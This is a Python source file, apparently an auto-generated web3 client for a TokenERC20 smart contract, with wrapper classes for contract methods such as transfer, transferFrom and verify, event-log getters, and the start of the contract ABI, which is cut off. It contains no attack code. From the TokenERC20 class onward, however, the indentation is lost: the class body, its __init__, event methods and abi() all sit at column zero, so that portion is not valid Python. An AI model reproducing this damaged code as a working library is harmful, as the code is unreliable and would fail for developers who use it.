class TotalSupplyMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the totalSupply method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> int:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return int(self._underlying_method().call(params))

    def send_transaction(
        self, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().transact(params)

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().buildTransaction(params)

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().estimateGas(params)
class TransferMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the transfer method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        # PEP 484: a default of None requires an Optional annotation.
        validator: Optional[Validator] = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, to: str, amount: int):
        """Validate the inputs to the transfer method."""
        self.validator.assert_valid(
            method_name="transfer",
            parameter_name="to",
            argument_value=to,
        )
        to = self.validate_and_checksum_address(to)
        self.validator.assert_valid(
            method_name="transfer",
            parameter_name="amount",
            argument_value=amount,
        )
        # safeguard against fractional inputs
        amount = int(amount)
        return (to, amount)

    def call(
        self, to: str, amount: int, tx_params: Optional[TxParams] = None
    ) -> bool:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        (to, amount) = self.validate_and_normalize_inputs(to, amount)
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method(to, amount).call(
            tx_params.as_dict()
        )
        return bool(returned)

    def send_transaction(
        self, to: str, amount: int, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        (to, amount) = self.validate_and_normalize_inputs(to, amount)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(to, amount).transact(
            tx_params.as_dict()
        )

    def build_transaction(
        self, to: str, amount: int, tx_params: Optional[TxParams] = None
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        (to, amount) = self.validate_and_normalize_inputs(to, amount)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(to, amount).buildTransaction(
            tx_params.as_dict()
        )

    def estimate_gas(
        self, to: str, amount: int, tx_params: Optional[TxParams] = None
    ) -> int:
        """Estimate gas consumption of method call."""
        (to, amount) = self.validate_and_normalize_inputs(to, amount)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(to, amount).estimateGas(
            tx_params.as_dict()
        )
class TransferFromMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the transferFrom method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        # PEP 484: a default of None requires an Optional annotation.
        validator: Optional[Validator] = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, _from: str, to: str, amount: int):
        """Validate the inputs to the transferFrom method."""
        self.validator.assert_valid(
            method_name="transferFrom",
            parameter_name="from",
            argument_value=_from,
        )
        _from = self.validate_and_checksum_address(_from)
        self.validator.assert_valid(
            method_name="transferFrom",
            parameter_name="to",
            argument_value=to,
        )
        to = self.validate_and_checksum_address(to)
        self.validator.assert_valid(
            method_name="transferFrom",
            parameter_name="amount",
            argument_value=amount,
        )
        # safeguard against fractional inputs
        amount = int(amount)
        return (_from, to, amount)

    def call(
        self,
        _from: str,
        to: str,
        amount: int,
        tx_params: Optional[TxParams] = None,
    ) -> bool:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        (_from, to, amount) = self.validate_and_normalize_inputs(
            _from, to, amount
        )
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method(_from, to, amount).call(
            tx_params.as_dict()
        )
        return bool(returned)

    def send_transaction(
        self,
        _from: str,
        to: str,
        amount: int,
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        (_from, to, amount) = self.validate_and_normalize_inputs(
            _from, to, amount
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(_from, to, amount).transact(
            tx_params.as_dict()
        )

    def build_transaction(
        self,
        _from: str,
        to: str,
        amount: int,
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        (_from, to, amount) = self.validate_and_normalize_inputs(
            _from, to, amount
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(_from, to, amount).buildTransaction(
            tx_params.as_dict()
        )

    def estimate_gas(
        self,
        _from: str,
        to: str,
        amount: int,
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call."""
        (_from, to, amount) = self.validate_and_normalize_inputs(
            _from, to, amount
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(_from, to, amount).estimateGas(
            tx_params.as_dict()
        )
class UnpauseMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the unpause method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> None:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        self._underlying_method().call(params)

    def send_transaction(
        self, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().transact(params)

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().buildTransaction(params)

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().estimateGas(params)
class VerifyMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the verify method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        # PEP 484: a default of None requires an Optional annotation.
        validator: Optional[Validator] = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(
        self, req: ITokenERC20MintRequest, signature: Union[bytes, str]
    ):
        """Validate the inputs to the verify method."""
        self.validator.assert_valid(
            method_name="verify",
            parameter_name="_req",
            argument_value=req,
        )
        self.validator.assert_valid(
            method_name="verify",
            parameter_name="_signature",
            argument_value=signature,
        )
        return (req, signature)

    def call(
        self,
        req: ITokenERC20MintRequest,
        signature: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> Tuple[bool, str]:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        (req, signature) = self.validate_and_normalize_inputs(req, signature)
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method(req, signature).call(
            tx_params.as_dict()
        )
        # The contract returns a 2-tuple (success flag, signer address).
        return (returned[0], returned[1])

    def send_transaction(
        self,
        req: ITokenERC20MintRequest,
        signature: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        (req, signature) = self.validate_and_normalize_inputs(req, signature)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(req, signature).transact(
            tx_params.as_dict()
        )

    def build_transaction(
        self,
        req: ITokenERC20MintRequest,
        signature: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        (req, signature) = self.validate_and_normalize_inputs(req, signature)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(req, signature).buildTransaction(
            tx_params.as_dict()
        )

    def estimate_gas(
        self,
        req: ITokenERC20MintRequest,
        signature: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call."""
        (req, signature) = self.validate_and_normalize_inputs(req, signature)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(req, signature).estimateGas(
            tx_params.as_dict()
        )
# pylint: disable=too-many-public-methods,too-many-instance-attributes
class TokenERC20:
"""Wrapper class for TokenERC20 Solidity contract.
All method parameters of type `bytes`:code: should be encoded as UTF-8,
which can be accomplished via `str.encode("utf_8")`:code:.
"""
# Method-wrapper attributes, one per contract function exposed by the ABI.
# Each is assigned a constructor-built instance in __init__ below.
default_admin_role: DefaultAdminRoleMethod
"""Constructor-initialized instance of
:class:`DefaultAdminRoleMethod`.
"""
domain_separator: DomainSeparatorMethod
"""Constructor-initialized instance of
:class:`DomainSeparatorMethod`.
"""
allowance: AllowanceMethod
"""Constructor-initialized instance of
:class:`AllowanceMethod`.
"""
approve: ApproveMethod
"""Constructor-initialized instance of
:class:`ApproveMethod`.
"""
balance_of: BalanceOfMethod
"""Constructor-initialized instance of
:class:`BalanceOfMethod`.
"""
burn: BurnMethod
"""Constructor-initialized instance of
:class:`BurnMethod`.
"""
burn_from: BurnFromMethod
"""Constructor-initialized instance of
:class:`BurnFromMethod`.
"""
checkpoints: CheckpointsMethod
"""Constructor-initialized instance of
:class:`CheckpointsMethod`.
"""
contract_type: ContractTypeMethod
"""Constructor-initialized instance of
:class:`ContractTypeMethod`.
"""
contract_uri: ContractUriMethod
"""Constructor-initialized instance of
:class:`ContractUriMethod`.
"""
contract_version: ContractVersionMethod
"""Constructor-initialized instance of
:class:`ContractVersionMethod`.
"""
decimals: DecimalsMethod
"""Constructor-initialized instance of
:class:`DecimalsMethod`.
"""
decrease_allowance: DecreaseAllowanceMethod
"""Constructor-initialized instance of
:class:`DecreaseAllowanceMethod`.
"""
delegate: DelegateMethod
"""Constructor-initialized instance of
:class:`DelegateMethod`.
"""
delegate_by_sig: DelegateBySigMethod
"""Constructor-initialized instance of
:class:`DelegateBySigMethod`.
"""
delegates: DelegatesMethod
"""Constructor-initialized instance of
:class:`DelegatesMethod`.
"""
get_past_total_supply: GetPastTotalSupplyMethod
"""Constructor-initialized instance of
:class:`GetPastTotalSupplyMethod`.
"""
get_past_votes: GetPastVotesMethod
"""Constructor-initialized instance of
:class:`GetPastVotesMethod`.
"""
get_platform_fee_info: GetPlatformFeeInfoMethod
"""Constructor-initialized instance of
:class:`GetPlatformFeeInfoMethod`.
"""
get_role_admin: GetRoleAdminMethod
"""Constructor-initialized instance of
:class:`GetRoleAdminMethod`.
"""
get_role_member: GetRoleMemberMethod
"""Constructor-initialized instance of
:class:`GetRoleMemberMethod`.
"""
get_role_member_count: GetRoleMemberCountMethod
"""Constructor-initialized instance of
:class:`GetRoleMemberCountMethod`.
"""
get_votes: GetVotesMethod
"""Constructor-initialized instance of
:class:`GetVotesMethod`.
"""
grant_role: GrantRoleMethod
"""Constructor-initialized instance of
:class:`GrantRoleMethod`.
"""
has_role: HasRoleMethod
"""Constructor-initialized instance of
:class:`HasRoleMethod`.
"""
increase_allowance: IncreaseAllowanceMethod
"""Constructor-initialized instance of
:class:`IncreaseAllowanceMethod`.
"""
initialize: InitializeMethod
"""Constructor-initialized instance of
:class:`InitializeMethod`.
"""
is_trusted_forwarder: IsTrustedForwarderMethod
"""Constructor-initialized instance of
:class:`IsTrustedForwarderMethod`.
"""
mint_to: MintToMethod
"""Constructor-initialized instance of
:class:`MintToMethod`.
"""
mint_with_signature: MintWithSignatureMethod
"""Constructor-initialized instance of
:class:`MintWithSignatureMethod`.
"""
multicall: MulticallMethod
"""Constructor-initialized instance of
:class:`MulticallMethod`.
"""
name: NameMethod
"""Constructor-initialized instance of
:class:`NameMethod`.
"""
nonces: NoncesMethod
"""Constructor-initialized instance of
:class:`NoncesMethod`.
"""
num_checkpoints: NumCheckpointsMethod
"""Constructor-initialized instance of
:class:`NumCheckpointsMethod`.
"""
pause: PauseMethod
"""Constructor-initialized instance of
:class:`PauseMethod`.
"""
paused: PausedMethod
"""Constructor-initialized instance of
:class:`PausedMethod`.
"""
permit: PermitMethod
"""Constructor-initialized instance of
:class:`PermitMethod`.
"""
primary_sale_recipient: PrimarySaleRecipientMethod
"""Constructor-initialized instance of
:class:`PrimarySaleRecipientMethod`.
"""
renounce_role: RenounceRoleMethod
"""Constructor-initialized instance of
:class:`RenounceRoleMethod`.
"""
revoke_role: RevokeRoleMethod
"""Constructor-initialized instance of
:class:`RevokeRoleMethod`.
"""
set_contract_uri: SetContractUriMethod
"""Constructor-initialized instance of
:class:`SetContractUriMethod`.
"""
set_platform_fee_info: SetPlatformFeeInfoMethod
"""Constructor-initialized instance of
:class:`SetPlatformFeeInfoMethod`.
"""
set_primary_sale_recipient: SetPrimarySaleRecipientMethod
"""Constructor-initialized instance of
:class:`SetPrimarySaleRecipientMethod`.
"""
supports_interface: SupportsInterfaceMethod
"""Constructor-initialized instance of
:class:`SupportsInterfaceMethod`.
"""
symbol: SymbolMethod
"""Constructor-initialized instance of
:class:`SymbolMethod`.
"""
total_supply: TotalSupplyMethod
"""Constructor-initialized instance of
:class:`TotalSupplyMethod`.
"""
transfer: TransferMethod
"""Constructor-initialized instance of
:class:`TransferMethod`.
"""
transfer_from: TransferFromMethod
"""Constructor-initialized instance of
:class:`TransferFromMethod`.
"""
unpause: UnpauseMethod
"""Constructor-initialized instance of
:class:`UnpauseMethod`.
"""
verify: VerifyMethod
"""Constructor-initialized instance of
:class:`VerifyMethod`.
"""
def __init__(
    self,
    web3_or_provider: Union[Web3, BaseProvider],
    contract_address: str,
    validator: TokenERC20Validator = None,
):
    """Get an instance of wrapper for smart contract.

    :param web3_or_provider: Either an instance of `web3.Web3`:code: or
        `web3.providers.base.BaseProvider`:code:
    :param contract_address: where the contract has been deployed
    :param validator: for validation of method inputs.
    """
    # pylint: disable=too-many-statements
    self.contract_address = contract_address
    # Fall back to the generated validator when the caller supplies none.
    if not validator:
        validator = TokenERC20Validator(web3_or_provider, contract_address)
    # Accept either a ready Web3 instance or a raw provider.
    web3 = None
    if isinstance(web3_or_provider, BaseProvider):
        web3 = Web3(web3_or_provider)
    elif isinstance(web3_or_provider, Web3):
        web3 = web3_or_provider
    else:
        raise TypeError(
            "Expected parameter 'web3_or_provider' to be an instance of either"
            + " Web3 or BaseProvider"
        )
    # if any middleware was imported, inject it
    try:
        MIDDLEWARE  # optional module-level name; NameError => none configured
    except NameError:
        pass
    else:
        try:
            for middleware in MIDDLEWARE:
                web3.middleware_onion.inject(
                    middleware["function"],
                    layer=middleware["layer"],
                )
        except ValueError as value_error:
            # NOTE(review): only the duplicate-injection message is matched,
            # but any other ValueError is currently swallowed here as well.
            if value_error.args == (
                "You can't add the same un-named instance twice",
            ):
                pass
    self._web3_eth = web3.eth
    # Bind the deployed contract's functions once; each wrapper attribute
    # below captures the matching ContractFunction. Wrappers for methods
    # with no validated inputs are built without the validator.
    functions = self._web3_eth.contract(
        address=to_checksum_address(contract_address), abi=TokenERC20.abi()
    ).functions
    self.default_admin_role = DefaultAdminRoleMethod(
        web3_or_provider, contract_address, functions.DEFAULT_ADMIN_ROLE
    )
    self.domain_separator = DomainSeparatorMethod(
        web3_or_provider, contract_address, functions.DOMAIN_SEPARATOR
    )
    self.allowance = AllowanceMethod(
        web3_or_provider, contract_address, functions.allowance, validator
    )
    self.approve = ApproveMethod(
        web3_or_provider, contract_address, functions.approve, validator
    )
    self.balance_of = BalanceOfMethod(
        web3_or_provider, contract_address, functions.balanceOf, validator
    )
    self.burn = BurnMethod(
        web3_or_provider, contract_address, functions.burn, validator
    )
    self.burn_from = BurnFromMethod(
        web3_or_provider, contract_address, functions.burnFrom, validator
    )
    self.checkpoints = CheckpointsMethod(
        web3_or_provider,
        contract_address,
        functions.checkpoints,
        validator,
    )
    self.contract_type = ContractTypeMethod(
        web3_or_provider, contract_address, functions.contractType
    )
    self.contract_uri = ContractUriMethod(
        web3_or_provider, contract_address, functions.contractURI
    )
    self.contract_version = ContractVersionMethod(
        web3_or_provider, contract_address, functions.contractVersion
    )
    self.decimals = DecimalsMethod(
        web3_or_provider, contract_address, functions.decimals
    )
    self.decrease_allowance = DecreaseAllowanceMethod(
        web3_or_provider,
        contract_address,
        functions.decreaseAllowance,
        validator,
    )
    self.delegate = DelegateMethod(
        web3_or_provider, contract_address, functions.delegate, validator
    )
    self.delegate_by_sig = DelegateBySigMethod(
        web3_or_provider,
        contract_address,
        functions.delegateBySig,
        validator,
    )
    self.delegates = DelegatesMethod(
        web3_or_provider, contract_address, functions.delegates, validator
    )
    self.get_past_total_supply = GetPastTotalSupplyMethod(
        web3_or_provider,
        contract_address,
        functions.getPastTotalSupply,
        validator,
    )
    self.get_past_votes = GetPastVotesMethod(
        web3_or_provider,
        contract_address,
        functions.getPastVotes,
        validator,
    )
    self.get_platform_fee_info = GetPlatformFeeInfoMethod(
        web3_or_provider, contract_address, functions.getPlatformFeeInfo
    )
    self.get_role_admin = GetRoleAdminMethod(
        web3_or_provider,
        contract_address,
        functions.getRoleAdmin,
        validator,
    )
    self.get_role_member = GetRoleMemberMethod(
        web3_or_provider,
        contract_address,
        functions.getRoleMember,
        validator,
    )
    self.get_role_member_count = GetRoleMemberCountMethod(
        web3_or_provider,
        contract_address,
        functions.getRoleMemberCount,
        validator,
    )
    self.get_votes = GetVotesMethod(
        web3_or_provider, contract_address, functions.getVotes, validator
    )
    self.grant_role = GrantRoleMethod(
        web3_or_provider, contract_address, functions.grantRole, validator
    )
    self.has_role = HasRoleMethod(
        web3_or_provider, contract_address, functions.hasRole, validator
    )
    self.increase_allowance = IncreaseAllowanceMethod(
        web3_or_provider,
        contract_address,
        functions.increaseAllowance,
        validator,
    )
    self.initialize = InitializeMethod(
        web3_or_provider, contract_address, functions.initialize, validator
    )
    self.is_trusted_forwarder = IsTrustedForwarderMethod(
        web3_or_provider,
        contract_address,
        functions.isTrustedForwarder,
        validator,
    )
    self.mint_to = MintToMethod(
        web3_or_provider, contract_address, functions.mintTo, validator
    )
    self.mint_with_signature = MintWithSignatureMethod(
        web3_or_provider,
        contract_address,
        functions.mintWithSignature,
        validator,
    )
    self.multicall = MulticallMethod(
        web3_or_provider, contract_address, functions.multicall, validator
    )
    self.name = NameMethod(
        web3_or_provider, contract_address, functions.name
    )
    self.nonces = NoncesMethod(
        web3_or_provider, contract_address, functions.nonces, validator
    )
    self.num_checkpoints = NumCheckpointsMethod(
        web3_or_provider,
        contract_address,
        functions.numCheckpoints,
        validator,
    )
    self.pause = PauseMethod(
        web3_or_provider, contract_address, functions.pause
    )
    self.paused = PausedMethod(
        web3_or_provider, contract_address, functions.paused
    )
    self.permit = PermitMethod(
        web3_or_provider, contract_address, functions.permit, validator
    )
    self.primary_sale_recipient = PrimarySaleRecipientMethod(
        web3_or_provider, contract_address, functions.primarySaleRecipient
    )
    self.renounce_role = RenounceRoleMethod(
        web3_or_provider,
        contract_address,
        functions.renounceRole,
        validator,
    )
    self.revoke_role = RevokeRoleMethod(
        web3_or_provider, contract_address, functions.revokeRole, validator
    )
    self.set_contract_uri = SetContractUriMethod(
        web3_or_provider,
        contract_address,
        functions.setContractURI,
        validator,
    )
    self.set_platform_fee_info = SetPlatformFeeInfoMethod(
        web3_or_provider,
        contract_address,
        functions.setPlatformFeeInfo,
        validator,
    )
    self.set_primary_sale_recipient = SetPrimarySaleRecipientMethod(
        web3_or_provider,
        contract_address,
        functions.setPrimarySaleRecipient,
        validator,
    )
    self.supports_interface = SupportsInterfaceMethod(
        web3_or_provider,
        contract_address,
        functions.supportsInterface,
        validator,
    )
    self.symbol = SymbolMethod(
        web3_or_provider, contract_address, functions.symbol
    )
    self.total_supply = TotalSupplyMethod(
        web3_or_provider, contract_address, functions.totalSupply
    )
    self.transfer = TransferMethod(
        web3_or_provider, contract_address, functions.transfer, validator
    )
    self.transfer_from = TransferFromMethod(
        web3_or_provider,
        contract_address,
        functions.transferFrom,
        validator,
    )
    self.unpause = UnpauseMethod(
        web3_or_provider, contract_address, functions.unpause
    )
    self.verify = VerifyMethod(
        web3_or_provider, contract_address, functions.verify, validator
    )
def get_approval_event(
    self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
    """Fetch log entries for the Approval event from a transaction.

    :param tx_hash: hash of transaction emitting Approval event
    """
    receipt = self._web3_eth.getTransactionReceipt(tx_hash)
    contract = self._web3_eth.contract(
        address=to_checksum_address(self.contract_address),
        abi=TokenERC20.abi(),
    )
    return contract.events.Approval().processReceipt(receipt)
def get_delegate_changed_event(
    self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
    """Fetch log entries for the DelegateChanged event from a transaction.

    :param tx_hash: hash of transaction emitting DelegateChanged event
    """
    receipt = self._web3_eth.getTransactionReceipt(tx_hash)
    contract = self._web3_eth.contract(
        address=to_checksum_address(self.contract_address),
        abi=TokenERC20.abi(),
    )
    return contract.events.DelegateChanged().processReceipt(receipt)
def get_delegate_votes_changed_event(
    self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
    """Fetch log entries for the DelegateVotesChanged event.

    :param tx_hash: hash of transaction emitting DelegateVotesChanged event
    """
    receipt = self._web3_eth.getTransactionReceipt(tx_hash)
    contract = self._web3_eth.contract(
        address=to_checksum_address(self.contract_address),
        abi=TokenERC20.abi(),
    )
    return contract.events.DelegateVotesChanged().processReceipt(receipt)
def get_paused_event(
    self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
    """Fetch log entries for the Paused event from a transaction.

    :param tx_hash: hash of transaction emitting Paused event
    """
    receipt = self._web3_eth.getTransactionReceipt(tx_hash)
    contract = self._web3_eth.contract(
        address=to_checksum_address(self.contract_address),
        abi=TokenERC20.abi(),
    )
    return contract.events.Paused().processReceipt(receipt)
def get_platform_fee_info_updated_event(
    self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
    """Fetch log entries for the PlatformFeeInfoUpdated event.

    :param tx_hash: hash of transaction emitting PlatformFeeInfoUpdated
        event
    """
    receipt = self._web3_eth.getTransactionReceipt(tx_hash)
    contract = self._web3_eth.contract(
        address=to_checksum_address(self.contract_address),
        abi=TokenERC20.abi(),
    )
    return contract.events.PlatformFeeInfoUpdated().processReceipt(receipt)
def get_primary_sale_recipient_updated_event(
    self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
    """Fetch log entries for the PrimarySaleRecipientUpdated event.

    :param tx_hash: hash of transaction emitting
        PrimarySaleRecipientUpdated event
    """
    receipt = self._web3_eth.getTransactionReceipt(tx_hash)
    contract = self._web3_eth.contract(
        address=to_checksum_address(self.contract_address),
        abi=TokenERC20.abi(),
    )
    return contract.events.PrimarySaleRecipientUpdated().processReceipt(
        receipt
    )
def get_role_admin_changed_event(
    self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
    """Fetch log entries for the RoleAdminChanged event.

    :param tx_hash: hash of transaction emitting RoleAdminChanged event
    """
    receipt = self._web3_eth.getTransactionReceipt(tx_hash)
    contract = self._web3_eth.contract(
        address=to_checksum_address(self.contract_address),
        abi=TokenERC20.abi(),
    )
    return contract.events.RoleAdminChanged().processReceipt(receipt)
def get_role_granted_event(
    self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
    """Fetch log entries for the RoleGranted event from a transaction.

    :param tx_hash: hash of transaction emitting RoleGranted event
    """
    receipt = self._web3_eth.getTransactionReceipt(tx_hash)
    contract = self._web3_eth.contract(
        address=to_checksum_address(self.contract_address),
        abi=TokenERC20.abi(),
    )
    return contract.events.RoleGranted().processReceipt(receipt)
def get_role_revoked_event(
    self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
    """Fetch log entries for the RoleRevoked event from a transaction.

    :param tx_hash: hash of transaction emitting RoleRevoked event
    """
    receipt = self._web3_eth.getTransactionReceipt(tx_hash)
    contract = self._web3_eth.contract(
        address=to_checksum_address(self.contract_address),
        abi=TokenERC20.abi(),
    )
    return contract.events.RoleRevoked().processReceipt(receipt)
def get_tokens_minted_event(
    self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
    """Fetch log entries for the TokensMinted event from a transaction.

    :param tx_hash: hash of transaction emitting TokensMinted event
    """
    receipt = self._web3_eth.getTransactionReceipt(tx_hash)
    contract = self._web3_eth.contract(
        address=to_checksum_address(self.contract_address),
        abi=TokenERC20.abi(),
    )
    return contract.events.TokensMinted().processReceipt(receipt)
def get_tokens_minted_with_signature_event(
    self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
    """Fetch log entries for the TokensMintedWithSignature event.

    :param tx_hash: hash of transaction emitting TokensMintedWithSignature
        event
    """
    receipt = self._web3_eth.getTransactionReceipt(tx_hash)
    contract = self._web3_eth.contract(
        address=to_checksum_address(self.contract_address),
        abi=TokenERC20.abi(),
    )
    return contract.events.TokensMintedWithSignature().processReceipt(
        receipt
    )
def get_transfer_event(
    self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
    """Fetch log entries for the Transfer event from a transaction.

    :param tx_hash: hash of transaction emitting Transfer event
    """
    receipt = self._web3_eth.getTransactionReceipt(tx_hash)
    contract = self._web3_eth.contract(
        address=to_checksum_address(self.contract_address),
        abi=TokenERC20.abi(),
    )
    return contract.events.Transfer().processReceipt(receipt)
def get_unpaused_event(
    self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
    """Fetch log entries for the Unpaused event from a transaction.

    :param tx_hash: hash of transaction emitting Unpaused event
    """
    receipt = self._web3_eth.getTransactionReceipt(tx_hash)
    contract = self._web3_eth.contract(
        address=to_checksum_address(self.contract_address),
        abi=TokenERC20.abi(),
    )
    return contract.events.Unpaused().processReceipt(receipt)
@staticmethod
def abi():
"""Return the ABI to the underlying contract."""
return json.loads(
'[{"inputs":[{"internalType":"address","name":"_thirdwebFee","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"delegator","type":"address"},{"indexed":true,"internalType":"address","name":"fromDelegate","type":"address"},{"indexed":true,"internalType":"address","name":"toDelegate","type":"address"}],"name":"DelegateChanged","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"delegate","type":"address"},{"indexed":false,"internalType":"uint256","name":"previousBalance","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"newBalance","type":"uint256"}],"name":"DelegateVotesChanged","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Paused","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"platformFeeRecipient","type":"address"},{"indexed":false,"internalType":"uint256","name":"platformFeeBps","type":"uint256"}],"name":"PlatformFeeInfoUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"recipient","type":"address"}],"name":"PrimarySaleRecipientUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"bytes32","name":"previousAdminRole","type":"bytes32"},{"indexed":true,"internalType":"bytes32","name":"newAdminRole","type":"bytes32"}],"name":"RoleAdminChanged","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","ty
pe":"bytes32"},{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":true,"internalType":"address","name":"sender","type":"address"}],"name":"RoleGranted","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":true,"internalType":"address","name":"sender","type":"address"}],"name":"RoleRevoked","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"mintedTo","type":"address"},{"indexed":false,"internalType":"uint256","name":"quantityMinted","type":"uint256"}],"name":"TokensMinted","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"signer","type":"address"},{"indexed":true,"internalType":"address","name":"mintedTo","type":"address"},{"components":[{"internalType":"address","name":"to","type":"address"},{"internalType":"address","name":"primarySaleRecipient","type":"address"},{"internalType":"uint256","name":"quantity","type":"uint256"},{"internalType":"uint256","name":"price","type":"uint256"},{"internalType":"address","name":"currency","type":"address"},{"internalType":"uint128